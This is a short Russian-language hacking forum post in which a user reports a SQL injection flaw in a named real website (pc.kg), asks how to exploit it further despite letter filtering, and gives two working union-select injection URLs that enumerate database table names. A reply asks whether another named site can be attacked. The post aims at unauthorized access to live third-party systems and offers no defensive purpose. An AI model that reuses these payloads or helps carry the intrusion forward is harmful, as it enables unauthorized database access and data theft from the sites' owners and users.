21.11.2008, 06:08
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Народ вот нашел уязвимость, судя по всему там стоит MSSQL, как дальше добить эту скулю не пойму, так как там нельзя использовать буквы
http://www.pc.kg/index.php?pageid=2&tg=-1+union+select+null,null,123+from+information_sche ma.tables--
Первое поле нормально выводится:
http://www.pc.kg/index.php?pageid=2&tg=-1+union+select+table_name,null,null+from+informati on_schema.tables--
можно ли пролезть вот в такую багу сайта?
http://www.hotindex.ru/Details.aspx?id=6927
нельзя, это не баг
|
|
|